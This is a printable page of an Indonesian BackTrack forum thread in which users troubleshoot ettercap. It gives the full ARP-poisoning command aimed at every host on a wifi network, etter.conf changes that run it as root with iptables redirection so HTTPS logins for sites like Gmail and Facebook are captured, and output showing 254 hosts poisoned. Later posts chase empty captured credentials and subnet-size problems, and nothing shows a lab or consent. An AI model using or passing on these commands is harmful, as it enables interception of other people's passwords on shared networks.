Indonesian Back|Track Team
ask-> ettercap in BT5 - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html)
+--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html)
+---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html)
+----- Forum: Backtrack 5 Tanya Jawab (https://www.indonesianbacktrack.or.id/forum/forum-86.html)
+----- Thread: ask-> ettercap in BT5 (/thread-148.html)

Pages: 1 2 3 4 5 6 7


RE: ask-> ettercap in BT5 - Junior Riau - 02-26-2012

tanda pagar didekat iptables dihapus tak??bukannya mesti dihapus


RE: ask-> ettercap in BT5 - bayu freaky13 - 03-05-2012

sudah broo,,,
pas lg sniffing ada user sama pass nya tapi gini " USER: PASS: INFO(null) "
koq gt yaa??? Angry


RE: ask-> ettercap in BT5 - japz_krist - 04-18-2012

om koq bs nya cuma dapet password dari http aja ya?!
kalo dari https g pernah dapet...
solusinya gimana?!


RE: ask-> ettercap in BT5 - puppy - 05-08-2012

(09-22-2011, 04:07 PM)gtx150 Wrote:
(09-22-2011, 03:38 PM)junior.riau18 Wrote:
(09-22-2011, 03:06 PM)gtx150 Wrote: To : all

sekarang udah ga usah pake script segala untuk sniffing password https seperti gmail, yahoo, facebook dll.

cukup dengan menjalankan ettercap saja

Code:
root@bt:~# ettercap -T -q -M arp -i wlan0 // //

command diatas telah di coba td malam bersama kelas death horse dan berhasil...

"So no more script to sniffing now"

begini kak hasilnya??

==>>
root@bt:~# ettercap -T -q -M arp -i wlan0 // //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

wlan0 -> 00:22:FA:20:B3:8E 172.16.40.251 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

254 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

DHCP: [1C:65:9D:26:C1:31] REQUEST 172.16.40.65
DHCP: [00:17:C4Big GrinC:C3Big Grin3] REQUEST 172.16.40.217
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] DISCOVER
DHCP: [00:1F:3C:A0:8F:4E] REQUEST 172.16.40.248
DHCP: [84:A8:E4:46Big Grin2:3B] DISCOVER
DHCP: [172.16.40.1] OFFER : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [172.16.40.1] ACK : 172.16.40.245 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [84:A8:E4:46Big Grin2:3B] REQUEST 172.16.40.245
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140
DHCP: [00:21:00:74:21:49] REQUEST 172.16.40.113
DHCP: [172.16.40.1] ACK : 172.16.40.113 255.255.255.0 GW 172.16.40.1 DNS 172.16.40.1
DHCP: [68:A3:C4:26:77:C7] REQUEST 172.16.40.140

yang ane warnain merah itu harus diedit om biar jadi 0
caranya:

root@bt:~# nano /etc/etter.conf

Code:
############################################################################
#                                                                          #
#  ettercap -- etter.conf -- configuration file                            #
#                                                                          #
#  Copyright (C) ALoR & NaGA                                               #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
#  $Id: etter.conf,v 1.78 2004/10/12 15:28:38 alor Exp $                   #
#                                                                          #
############################################################################

[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default



#####################################
#       redir_command_on/off
#####################################

#---------------
#     Linux
#---------------

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#---------------

silahkan edit ettercapnya seperti diatas lalu save.

om, punya ane kok jadi banyak bener hoast yang di scan. gimana ni om ngeditnya??
UID dan GID udah 0.
tolong om,,,

Randomizing 65535 hosts for scanning...
Scanning the whole netmask for 65535 hosts...
* |==================================================>| 100.00 %



RE: ask-> ettercap in BT5 - iKONspirasi - 05-08-2012

wkwkwk byk bener 65 rb host, pasti subnet masknya bukan /24 tapi /16 alias 255.255.0.0


RE: ask-> ettercap in BT5 - puppy - 05-08-2012

ho'oh om...

mpe heng lepi ane...

jadi gk bisa di atasin tu om???


RE: ask-> ettercap in BT5 - iKONspirasi - 05-08-2012

tinggal ganti subnet mask ipmu aja pake /24 atau 255.255.255.0 Tongue


RE: ask-> ettercap in BT5 - puppy - 05-08-2012

oke om, ntr ane coba,

makasih om,,http://forum.indonesianbacktrack.or.id/images/smilies/penguin-010.gif


RE: ask-> ettercap in BT5 - Backtrack Dragon - 05-10-2012

Kok ettercapku masih tetap seperti ini yah padahal sudah mengikuti saran-saran di atas

root@bt:~# ettercap -T -q -M arp -i wlan0 // //

ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA

Listening on wlan0... (Ethernet)

wlan0 -> 90:A4Big GrinE:78:8F:31 192.168.55.253 255.255.255.0

(ini masalahnya) SSL dissection needs a valid 'redir_command_on' script in the etter.conf file


RE: ask-> ettercap in BT5 - iKONspirasi - 05-10-2012

(05-10-2012, 09:33 PM)Backtrack Dragon Wrote: Kok ettercapku masih tetap seperti ini yah padahal sudah mengikuti saran-saran di atas

root@bt:~# ettercap -T -q -M arp -i wlan0 // //

ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA

Listening on wlan0... (Ethernet)

wlan0 -> 90:A4Big GrinE:78:8F:31 192.168.55.253 255.255.255.0

(ini masalahnya) SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

coba lihat isi file etter.conf nya